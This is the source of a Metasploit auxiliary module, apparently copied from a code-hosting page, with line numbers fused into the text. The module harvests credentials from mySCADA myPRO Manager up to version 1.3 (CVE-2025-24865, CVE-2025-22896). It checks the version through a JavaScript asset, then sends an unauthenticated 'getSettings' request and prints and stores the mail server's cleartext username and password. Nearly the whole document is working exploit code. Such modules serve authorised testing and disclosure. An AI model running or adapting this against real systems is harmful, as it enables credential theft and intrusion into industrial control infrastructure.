Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place. Commercial Alternative to JupyterHub.
Path: blob/master/modules/auxiliary/admin/scada/mypro_mgr_creds.rb
Views: 18092
class MetasploitModule < Msf::Auxiliary1include Msf::Exploit::Remote::HttpClient2prepend Msf::Exploit::Remote::AutoCheck3CheckCode = Exploit::CheckCode45def initialize(info = {})6super(7update_info(8info,9'Name' => 'mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896)',10'Description' => %q{11Credential Harvester in MyPRO Manager <= v1.3 from mySCADA.12The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly veryfing that the associated request is coming from an authenticated and authorized entity.13},14'License' => MSF_LICENSE,15'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module16'References' => [17[ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16'],18[ 'CVE', '2025-24865'],19[ 'CVE', '2025-22896']20],21'DisclosureDate' => '2025-02-13',22'DefaultOptions' => {23'RPORT' => 34022,24'SSL' => 'False'25},26'Platform' => 'win',27'Arch' => [ ARCH_CMD ],28'Targets' => [29[30'Windows_Fetch',31{32'Arch' => [ ARCH_CMD ],33'Platform' => 'win',34'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },35'Type' => :win_fetch36}37]38],39'DefaultTarget' => 0,4041'Notes' => {42'Stability' => [CRASH_SAFE],43'Reliability' => [REPEATABLE_SESSION],44'SideEffects' => [IOC_IN_LOGS]45}46)47)4849register_options(50[51OptString.new(52'TARGETURI',53[ true, 'The URI for the MyPRO Manager web interface', '/' ]54)55]56)57end5859def check60begin61res = send_request_cgi({62'method' => 'GET',63'uri' => normalize_uri(target_uri.path, 'assets/index-DBkpc6FO.js')64})65rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError66return CheckCode::Unknown67end6869if res.to_s =~ /const S="([^"]+)"/70version = ::Regexp.last_match(1)71vprint_status('Version retrieved: ' + version)72if Rex::Version.new(version) <= Rex::Version.new('1.3')73return CheckCode::Appears74end7576return CheckCode::Safe77end78return CheckCode::Unknown79end8081def run82post_data = {83'command' => 'getSettings'84}8586res = send_request_cgi({87'method' => 'POST',88'ctype' => 'application/json',89'data' => JSON.generate(post_data),90'uri' => normalize_uri(target_uri.path, 'get')91})9293fail_with(Failure::Unknown, 'No response from server.') if res.nil?94fail_with(Failure::UnexpectedReply, 'Non-200 returned from server.') if res.code != 20095print_good('Mail server credentials retrieved:')96data = res.get_json_document9798if data.key?('smtp') && data['smtp'].is_a?(Hash)99smtp_info = data['smtp']100101host = smtp_info.fetch('host', 'Unknown Host')102port = smtp_info.fetch('port', 'Unknown Port')103auth = smtp_info.fetch('auth', 'Unknown Auth')104user = smtp_info.fetch('user', 'Unknown User')105passw = smtp_info.fetch('pass', 'Unknown Password')106107print_good("Host: #{host}")108print_good("Port: #{port}")109print_good("Auth Type: #{auth}")110print_good("User: #{user}")111print_good("Password: #{passw}")112113unless user == 'Unknown User' || passw == 'Unknown Password'114store_valid_credential(user: user, private: passw, proof: data.to_s)115end116end117end118119end120121122